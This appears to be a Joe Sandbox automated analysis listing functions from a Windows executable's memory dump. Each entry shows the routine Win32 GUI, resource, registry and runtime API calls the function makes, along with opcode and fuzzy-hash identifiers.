API String ID: 4233697448-0
Opcode ID: 0c2f422356bf74971aff1319cc153dee87da6dde547454f15bdf1e43fc7586e6
Instruction ID: 905d97582e4a86b8ee9f20ac4baf044e3ff73546b9c1c1585f9f36951aa614d4
Opcode Fuzzy Hash: 0c2f422356bf74971aff1319cc153dee87da6dde547454f15bdf1e43fc7586e6
Instruction Fuzzy Hash: 873158B1A0024DEFCF14DFA4C9849BE7BF5FB48300B10846EF91A97110DB31A954DB60

Function 00C39C5C Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C39C8B
GetParent.USER32(?), ref: 00C39C94

Part of subcall function 00BD8054: ScreenToClient.USER32(?,?), ref: 00BD8065
Part of subcall function 00BD8054: ScreenToClient.USER32(?,?), ref: 00BD8072

OffsetRect.USER32(?,00000000,?), ref: 00C39CD5
OffsetRect.USER32(?,?,00000000), ref: 00C39CE7

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$ClientOffsetScreen$ParentWindow
String ID:
API String ID: 182828750-0
Opcode ID: b14e5fa57d3eeafb7cb30c3202431c1ff6ef7186abfb4a2f2d6c234bb91870c9
Instruction ID: bfe0a007b68b24f27fb243d389da7172b3ad2d06f270dd6adc6e7eb7c8771490
Opcode Fuzzy Hash: b14e5fa57d3eeafb7cb30c3202431c1ff6ef7186abfb4a2f2d6c234bb91870c9
Instruction Fuzzy Hash: A3211DB1900149AFDF24DFA9DD88EBFBBF9FB88300F10051AF416E6250DA749A40DB21

Function 00C23B52 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000000), ref: 00C23B73
ScreenToClient.USER32(?,00000000), ref: 00C23B80
SetCursor.USER32 ref: 00C23BAD
PtInRect.USER32(?,00000000,00000000), ref: 00C23C17

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Cursor$ClientRectScreen
String ID:
API String ID: 2390797981-0
Opcode ID: d54021fcd6997a1616d9da6c9c4aa05cb55ee45500b2da780610c41a2241af48
Instruction ID: ada7fd96d6e6dd422fdd390496564751142733cc1b32ca8f31fe5825f33d115c
Opcode Fuzzy Hash: d54021fcd6997a1616d9da6c9c4aa05cb55ee45500b2da780610c41a2241af48
Instruction Fuzzy Hash: E7214B32900699EFCB20DFA4EC88F9EBBBAEB40315F104558E415E6510DB34EB45DB50

Function 00C13183 Relevance: 6.1, APIs: 4, Instructions: 73keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 00C1319A
GetCursorPos.USER32(?), ref: 00C131E0
SetRectEmpty.USER32(?), ref: 00C131F6
IsRectEmpty.USER32(?), ref: 00C13220

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: EmptyRect$CursorState
String ID:
API String ID: 2369637639-0
Opcode ID: 2a9949225a8a2a6441593162ea1ef469d668964d9d142a18e0edb50e1aa3c638
Instruction ID: a7021f075743266343560621ea422f4714cb482d5304d6a8e701e4fc8b7781a2
Opcode Fuzzy Hash: 2a9949225a8a2a6441593162ea1ef469d668964d9d142a18e0edb50e1aa3c638
Instruction Fuzzy Hash: 86212F71E00299AFCF15EFA5D8849EEBBB8FB49744B10402AF112E6200D7709B419BA1

Function 00BFC145 Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00BFC180
PtInRect.USER32(?,?,?), ref: 00BFC198

Part of subcall function 00BFB87F: ScreenToClient.USER32(?,?), ref: 00BFB89C
Part of subcall function 00BFB87F: GetParent.USER32(?), ref: 00BFB8B3

MapWindowPoints.USER32(?,?,?,00000001), ref: 00BFC1CF
SendMessageA.USER32(?,00000201,?,?), ref: 00BFC1EE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientRect$MessageParentPointsScreenSendWindow
String ID:
API String ID: 4233697448-0
Opcode ID: 637cdd15263c85af1c2a4b9f9778477cdfce76bc1bc72f41f2f33d79a9d074ea
Instruction ID: 8555321343aeeaaef794511579d959369b8079965972da476ba6b0a76b7cda42
Opcode Fuzzy Hash: 637cdd15263c85af1c2a4b9f9778477cdfce76bc1bc72f41f2f33d79a9d074ea
Instruction Fuzzy Hash: 8721197190024EAFDF10DFA5CC84EBEBBF5FB48340F104529F915A6210DB71AA64DB50

Function 00CC9AA2 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 695216d2246b570cd094d4b4f68ae1380dc8acf924fc8807a9a19fca7cde4bfe
Instruction ID: 49bda8319f3fe01b1d02b2b0e2656a44a0050f39175f6614d0e05456e605b5d6
Opcode Fuzzy Hash: 695216d2246b570cd094d4b4f68ae1380dc8acf924fc8807a9a19fca7cde4bfe
Instruction Fuzzy Hash: 6511E672500244FFDF316B64EC48F5E3EB9EB447A0F114228F925DB1A0DB71DE50AA60

Function 00CC8057 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00CC8078

Part of subcall function 00CC6402: __FF_MSGBANNER.LIBCMT ref: 00CC641B
Part of subcall function 00CC6402: __NMSG_WRITE.LIBCMT ref: 00CC6422
Part of subcall function 00CC6402: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00BD7426,00BD7426,?,000000FF,?,00CCCFE9,00000011,00BD7426,?,00CCD3EE,0000000D), ref: 00CC6447

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: c16228470206ab9041b369982e09303a6404cf82cae3968fcb56845866e7037b
Instruction ID: d4504e61bb632eeda77e87bd6246f1dbb61c87bbc235c2e867e775b5f66e2d9f
Opcode Fuzzy Hash: c16228470206ab9041b369982e09303a6404cf82cae3968fcb56845866e7037b
Instruction Fuzzy Hash: 3411A732504711ABCB266F74EC05F5F3B95EB443A0F24452DF8599B261EE34CD88AB91

Function 00BD91E4 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BD9233
GetWindowRect.USER32(?,?), ref: 00BD9254
PtInRect.USER32(?,?,?), ref: 00BD9264
CallNextHookEx.USER32(?,?,?), ref: 00BD928C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$CallCursorHookNextWindow
String ID:
API String ID: 3719484595-0
Opcode ID: 757cbe215409db206b3010fb2994607fe63495276b53fcfeee60c5efaf2fdbd7
Instruction ID: 0ecf17ce02480df51a9e9308b60dbdae934be9b8d48414a1f2d9c775ad381c7f
Opcode Fuzzy Hash: 757cbe215409db206b3010fb2994607fe63495276b53fcfeee60c5efaf2fdbd7
Instruction Fuzzy Hash: 5B21EA7690020AAFCF01DFA9EE449AEFFF5FF58301F04416AE501E6260E6319A01DB51

Function 00CAC961 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,00000005), ref: 00CAC981
LoadResource.KERNEL32(?,00000000,?,00000000,?,00CACC44,00000005,?), ref: 00CAC996
LockResource.KERNEL32(00000000,?,00000000,?,00CACC44,00000005,?), ref: 00CAC9A8
GlobalFree.KERNEL32(?), ref: 00CAC9E2

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Resource$FindFreeGlobalLoadLock
String ID:
API String ID: 3898064442-0
Opcode ID: 1f9d01afc6b8d7546fd949ed577edc0d7912a86a7745fe7187b6d86ceee59308
Instruction ID: b78f95fbbdee345a37014bdc7c604d98079c1b2a4cf0b64b03789a6c64e62778
Opcode Fuzzy Hash: 1f9d01afc6b8d7546fd949ed577edc0d7912a86a7745fe7187b6d86ceee59308
Instruction Fuzzy Hash: 0A11B631100702AFCB216F75C8C4F5BBBE9EF86768B15801EF9658B661EB34E8019B11

Function 00C2EBD6 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE23AF: GetDlgItem.USER32(?,?), ref: 00BE23C0

GetWindowLongA.USER32(?,000000F0), ref: 00C2EBF3
GetWindowTextLengthA.USER32(?), ref: 00C2EC20
GetWindowTextA.USER32(?,00000000,00000100), ref: 00C2EC4F
SendMessageA.USER32(?,0000014D,000000FF,?), ref: 00C2EC70

Part of subcall function 00BE2F51: lstrlenA.KERNEL32(?,?,?), ref: 00BE2F7D
Part of subcall function 00BE2F51: _memset.LIBCMT ref: 00BE2F9A
Part of subcall function 00BE2F51: GetWindowTextA.USER32(00000000,00000000,00000100), ref: 00BE2FB4
Part of subcall function 00BE2F51: lstrcmpA.KERNEL32(00000000,?,?,?), ref: 00BE2FC6
Part of subcall function 00BE2F51: SetWindowTextA.USER32(00000000,?), ref: 00BE2FD2

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Text$ItemLengthLongMessageSend_memsetlstrcmplstrlen
String ID:
API String ID: 205973220-0
Opcode ID: c6c29978c9c0fa682633b9d2e2d5116bd22ae01b68c0a13d72a0790e7f3ad0ab
Instruction ID: 6d536116cfe64e3d68b425edd4be13a2b4dbf6345219f8113e6bab9e8f35155c
Opcode Fuzzy Hash: c6c29978c9c0fa682633b9d2e2d5116bd22ae01b68c0a13d72a0790e7f3ad0ab
Instruction Fuzzy Hash: DF11B231004259FFCF119FA4DC45FAD7BA6EF04320F148219F8796A5E0CB71A991EB81

Function 00BD59BF Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 00BD59EA
LoadResource.KERNEL32(?,00000000), ref: 00BD59F2
LockResource.KERNEL32(00000000), ref: 00BD5A04
FreeResource.KERNEL32(00000000), ref: 00BD5A52

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: f100b8759ed276237b099d35ff3a4df46be3b5c558738f764d7d34b07b808756
Instruction ID: 21dd4175e6f97d4005f14c1e833370cfd35d9d1df015c09a41e02421bada379e
Opcode Fuzzy Hash: f100b8759ed276237b099d35ff3a4df46be3b5c558738f764d7d34b07b808756
Instruction Fuzzy Hash: BE11AC30500A21EFD7308FA5C8C8B6AF7F8FB04711F1082AAE952436A0E774ED40DB60

Function 00C145E5 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C14608
GetWindowRect.USER32(?,?), ref: 00C14621
WindowFromPoint.USER32(?,?), ref: 00C1462D
PtInRect.USER32(?,?,?), ref: 00C14645

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: RectWindow$CursorFromPoint
String ID:
API String ID: 3445796726-0
Opcode ID: f73868668971be0bc70a228625fdb55b7efbc6113fc62b00b1d8c51346604430
Instruction ID: 1aca233d7e82b23d4574d30792d83127225f26506464a7e40113336a5bea27c9
Opcode Fuzzy Hash: f73868668971be0bc70a228625fdb55b7efbc6113fc62b00b1d8c51346604430
Instruction Fuzzy Hash: A2111C71D0020AEF8F10DFA5D8849FFBBF9FF99344B10046AE515E6120DA75AA42EB61

Function 00BD4F15 Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 00BD4F52
RegCloseKey.ADVAPI32(00000000), ref: 00BD4F5B
swprintf.LIBCMT ref: 00BD4F78
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00BD4F89

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: 36e8df563f41231cc7e34daaadf7ca671754e63f79fa26f5fb34f36ab3280622
Instruction ID: 0c6b52528e17b6f44c3a8848013940e48bc7d4ba3dfae1d01c4c0198edcc07f7
Opcode Fuzzy Hash: 36e8df563f41231cc7e34daaadf7ca671754e63f79fa26f5fb34f36ab3280622
Instruction Fuzzy Hash: 7D016172500209BFD710DB648C85FBFB7ACEF48714F10056AF601AB290EB75ED019B65

Function 00BDD4A8 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,0000000C,?), ref: 00BDD4F5
SetBkColor.GDI32(?,?), ref: 00BDD4FF
GetSysColor.USER32(00000008), ref: 00BDD50F
SetTextColor.GDI32(?,?), ref: 00BDD517

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Color$ObjectText
String ID:
API String ID: 829078354-0
Opcode ID: 380a24f90d9fb1e9349bd0ab89617fcb6ad603486c0292e2e8e9ba81eb042c64
Instruction ID: ecac0807c1d1e01a846fd9401376aa7d937f6110a2c5a339f3e23723315755f8
Opcode Fuzzy Hash: 380a24f90d9fb1e9349bd0ab89617fcb6ad603486c0292e2e8e9ba81eb042c64
Instruction Fuzzy Hash: 4E116175600204AB8B20DF68AC88EBFBBE9EF99718F540556F953D7290EB30ED058761

Function 00BD97D8 Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,00000000,?), ref: 00BD9814

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

GetFocus.USER32 ref: 00BD982A
GetParent.USER32(?), ref: 00BD9838
SendMessageA.USER32(?,00000028,00000000,00000000), ref: 00BD984B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: b1a86305558b243148050f1e85d333e4c7df85343469c362586337f53c8962e0
Instruction ID: 25b5c626c21f0b7a7fbb95714750e16e7c7abbbb9b070ff7c9f571cd037bcf07
Opcode Fuzzy Hash: b1a86305558b243148050f1e85d333e4c7df85343469c362586337f53c8962e0
Instruction Fuzzy Hash: BA118E71100644AFCB30AF20DCC5A6AFBFAFB85751710866EF1465AA60E731EC44DBA1

Function 00C202E9 Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C20326
GetSystemMetrics.USER32(0000002D), ref: 00C2033A
GetSystemMetrics.USER32(00000002), ref: 00C20342
SendMessageA.USER32(?,0000101E,00000000,00000000), ref: 00C2035A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MetricsSystem$ClientMessageRectSend
String ID:
API String ID: 2251314529-0
Opcode ID: 39c96a8e261522e0b835b7d27637ec30af496e5288b24e3d04390f47ade1ed72
Instruction ID: 9b2e7dad20dd0288680aacc99c6600fce5c88fe485b6fd81ea91efeb43f7262e
Opcode Fuzzy Hash: 39c96a8e261522e0b835b7d27637ec30af496e5288b24e3d04390f47ade1ed72
Instruction Fuzzy Hash: DE018872A00214AFCB10DF79DD85BAE7BF4FB48710F11417AE905EB191DA70AD00CB60

Function 00C22E19 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 00C22E56
_memset.LIBCMT ref: 00C22E6C
GetObjectA.GDI32(?,0000003C,?), ref: 00C22E7D
CreateFontIndirectA.GDI32(?), ref: 00C22E8E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$CreateFontIndirectStock_memset
String ID:
API String ID: 1064234985-0
Opcode ID: 613115565174af6f92f14755dc017a9c1cdfe5e07363d76f00b7f4c4138ebfb9
Instruction ID: 7146897bfe9c56857bf72e305ef1f597e0f917884e93770772ad5760e59a28d5
Opcode Fuzzy Hash: 613115565174af6f92f14755dc017a9c1cdfe5e07363d76f00b7f4c4138ebfb9
Instruction Fuzzy Hash: C201D671600614FFDB15AB64DC49FAEB7A9BF44B11F150019F616E7280EFB0AE06DB81

Function 00BFFBAE Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 00BFFBCC
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 00BFFBE5
DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 00BFFC18
DragFinish.SHELL32(?), ref: 00BFFC40

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: 06f5c02d60f2094b50f6d4638786e69f28800e6f1fb389fb9d368c968bbc810c
Instruction ID: 3a17af301d14f60cb89dc9239c5b32182cccc6bfdcfbe30ee6d96baf403b066f
Opcode Fuzzy Hash: 06f5c02d60f2094b50f6d4638786e69f28800e6f1fb389fb9d368c968bbc810c
Instruction Fuzzy Hash: A2114C71900218AFCB24AB64CC89FEDB7B8EF58310F1045D6E655A7191DBB4AA85CF90

Function 00C39A39 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000000), ref: 00C39A4F

Part of subcall function 00C39578: GetWindowRect.USER32(?,?), ref: 00C3958E
Part of subcall function 00C39578: GetParent.USER32(?), ref: 00C395D0
Part of subcall function 00C39578: GetParent.USER32(?), ref: 00C395E0

ScreenToClient.USER32(?,?), ref: 00C39A77
SetCapture.USER32(?), ref: 00C39A97
GetWindowRect.USER32(?,?), ref: 00C39AD2

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
